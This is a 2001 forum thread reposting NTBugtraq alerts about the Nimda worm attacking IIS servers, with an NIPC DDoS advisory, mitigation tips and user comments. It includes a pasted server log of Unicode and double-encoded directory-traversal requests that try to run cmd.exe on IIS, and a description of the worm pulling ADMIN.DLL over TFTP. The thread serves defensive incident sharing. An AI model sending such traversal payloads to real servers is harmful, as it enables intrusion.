-----BEGIN PGP SIGNED MESSAGE-----

There have been numerous reports of IIS attacks being generated by
machines over a broad range of IP addresses. These "infected"
machines are using a wide variety of attacks which attempt to exploit
already known and patched vulnerabilities against IIS.

It appears that the attacks can come both from email and from the
network.

A new worm, being called w32.nimda.amm, is being sent around. The
attachment is called README.EXE and comes as a MIME-type of
"audio/x-wav" together with some html parts. There appears to be no
text in this message when it is displayed by Outlook when in
Auto-Preview mode (always a good indication there's something not
quite right with an email.)

The network attacks against IIS boxes are a wide variety of attacks.
Amongst them appear to be several attacks that assume the machine is
compromised by Code Red II (looking for ROOT.EXE in the /scripts and
/msadc directory, as well as an attempt to use the /c and /d virtual
roots to get to CMD.EXE). Further, it attempts to exploit numerous
other known IIS vulnerabilities.

One thing to note is the attempt to execute TFTP.EXE to download a
file called ADMIN.DLL from (presumably) some previously compromised
box.

Anyone who discovers a compromised machine (a machine with ADMIN.DLL
in the /scripts directory), please forward me a copy of that .dll
ASAP.

Also, look for TFTP traffic (UDP69). As a safeguard, consider doing
the following;

edit %systemroot/system32/drivers/etc/services.

change the line;

tftp 69/udp

to;

tftp 0/udp

thereby disabling the TFTP client. W2K has TFTP.EXE protected by
Windows File Protection so can't be removed.

More information as it arises.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.2

iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH
Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6
iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO
hSW7yN2lhJc=
=YAwc
-----END PGP SIGNATURE-----

============================================================================
Delivery co-sponsored by Trend Micro, Inc.
============================================================================
TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE

If you are worried about email viruses, you need Trend Micro ScanMail for
Exchange. ScanMail is the first antivirus solution that seamlessly
integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. ScanMail
ensures 100% inbound and outbound email virus scanning and provides remote
software management. Download a FREE 30-day trial copy of ScanMail and find
out why it is the best:
http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000
============================================================================

I hate administering IIS ......

Dump windoze! Head for Unix. That is all.

Thanks toenail! Bump!

YouDaMan....

I've been working on these code red worms for the last 20 days and appreciate the author's insight. Do you have a url?

Previously patched boxes shouldn't have a problem. MS has an update on their site (windowsupdate.microsoft.com) that patches all known holes on IIS in case you're not sure of your box's security. We just re-patched our web servers to make sure nothing was missed...

Herewith a related story from the cybertelecom.org mailing list:

ADVISORY 01-021

http://www.nipc.gov/warnings/advisories/2001/01-021.htm "Potential Distributed Denial of Service (DDoS) Attacks " 09/17/2001

The National Infrastructure Protection Center (NIPC) expects an increase in Distributed Denial of Service (DDoS) attacks. NIPC Advisory 01-020, "Increased Cyber Awareness" dated September 14, 2001 warned of threatened vigilante hacking activity against organizations associated with the perceived perpetrators of the September 11, 2001 terror attacks.

On September 12, 2001, a group of hackers named the Dispatchers claimed they had already begun network operations against information infrastructure components such as routers. The Dispatchers stated they were targeting the communications and finance infrastructures. They also predicted that they would be prepared for increased operations on or about Tuesday, September 18, 2001.

There is the opportunity for significant collateral damage to any computer network and telecommunications infrastructure that does not have current countermeasures in place. The Dispatchers claim to have over 1,000 machines under their control for the attacks. It is likely that the attackers will mask their operations by using the IP addresses and pirated systems of uninvolved third parties.

System administrators are encouraged to check their systems for zombie agent software and ensure they institute best practices such as ingress and egress filtering. The NIPC has made available the "Find DDoS" tool to determine if your computer has been infected by the most common DDoS agents. The tool may be downloaded from the following website:

http://www.nipc.gov/warnings/advisories/2000/00-055.htm.

Additionally, a list of best practices is available from the CERT/CC website, located at: http://www.cert.org/security-improvement.

Recipients of this advisory are encouraged to report computer intrusions to their local FBI office (http://www.fbi.gov/contact/fo/fo.htm) or the NIPC, and to the other appropriate authorities. Incidents may be reported online at http://www.nipc.gov/incident/cirr.htm. The NIPC Watch and Warning Unit can be reached at (202) 323-3204/3205/3206 or nipc.watch@fbi.gov.

** www.cybertelecom.org **

Looks like you dont have to worry about code red much anymore. Since this started at 9 this morning my system hasnt gotten any CR hits. The annoyin part is this one sucks more than CR, 16 hits from each infected machine.

I'm seeing a lot of that junk right now:

65.100.214.71 - - [18/Sep/2001:09:30:50 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:54 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:54 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:54 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:54 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 345 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:55 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:55 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:55 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:55 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:56 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:56 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:56 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:57 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"

Fortunately, our servers are Debian GNU/Linux with Apache.

I started seeing this in my logs around 6:34 AM this morning. It has flooded our ISP's routers and I am on dialup right now.

I wonder if this is the precusor to something else?

Yup, I am seeing the same thing in my logs as well.

Ding dongs! The Dispatchers were supposed to hit the bad guys. You would have thought they would have only targeted subnets in the Middle East.

-----BEGIN PGP SIGNED MESSAGE-----

Numerous people have reported that on IIS servers infected with
w32.nimda.amm, when visitors browse to their website the visitor is
offered up README.EML, which in turn downloads README.EXE to the
visitor.

Please, check your IIS boxes now to see if you are infected. I've had
reports of IIS servers with more than 10,000 .eml files present
(mostly as a result of nimda).

While we don't have any conclusive disinfecting procedures yet, any
IIS box that has been infected definitely shouldn't be available to
clients until we do.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.2

iQCVAwUBO6d1/RBh2Kw/l7p5AQEk4AP+N4foFCyTyBb9nzILJPULLWcEvItbbvm+
Td9+lGUTjvmxbH8dTZ+ITddraZGyD+FDo9fdCGT+XZilSInvhihN1OVE70NgUFPI
5lCm/mTiBExXvos8o61fCzzL9rJ2nCW47Wx1WX//2LHhg740actR+XV0TPQqG1Rw
+6PAR+SPMJc=
=k/xS
-----END PGP SIGNATURE-----

============================================================================
Delivery co-sponsored by Trend Micro, Inc.
============================================================================
TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE

If you are worried about email viruses, you need Trend Micro ScanMail for
Exchange. ScanMail is the first antivirus solution that seamlessly
integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. ScanMail
ensures 100% inbound and outbound email virus scanning and provides remote
software management. Download a FREE 30-day trial copy of ScanMail and find
out why it is the best:
http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000
============================================================================

Hey, toenail,

I'm sure everything you said is good, but being a member of the paper-and-pencil generation (born 1931), I didn't understand a bit of it.

Apparently a lot people did understand it, so keep up the good work.

God Bless the USA.

B14

I hate administering IIS ......

You and me both. This is all I f'ing need today....

Thanks for the post.

Something hit my home PC today - while at FR website - but it might have been from email. Messages were coming in. I use Zone alarm and Norton Antivirus. on dialup modem. I rebooted my Dell and it did fine - but this worm may still be there - right? What measures should a non-techie take?

What measures should a non-techie take?

Hang tight for right now.  Symantec (makes NAV) doesn't have an updated virus pattern file yet for this worm.

You can check for updates at the following location:

http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

Well, I've gotten 25 hits in the last half-hour. 2 is typical.

I located the root.exe and admin.dll payloads on my machine. Not fun. I'm still stuck with an NT comm.drv (in '98) and loads of orphaned NT processes. Together they hog the CPU (P3/866@1G). It's runs 40% at desktop idle. At least that's better than the 95% I started with when I had explorer.exe ver. 3112. I wonder, who would make a virus which would update the shell and clog the CPU? Imo, to do that they'd have to know the source code in order to have kernal32 spin-up a new shell.

Virus scanners (Trend, Symmantic) didn't detect this and ZA didn't stop it.

Virus scanners (Trend, Symmantic) didn't detect this and ZA didn't stop it.

I disconnected temporarily until Symantec comes out with updated pattern files.

As for the coding... not sure. I wonder if this is what the Dispatchers were working on (probably) or just happens to have occurred at the same time.

I have received two emails with this attachement so far in the past two days.They get deleted without even being opened.

There is a known bug in MSIE 5 that automatically executes files with a ".eml" extension. The prescribed workaround is to go into your security settings (Tools->Internet Options->Security->Custom Levels) and disable Active Scripting. The program embedded in the ".eml" file should then ask permission before running.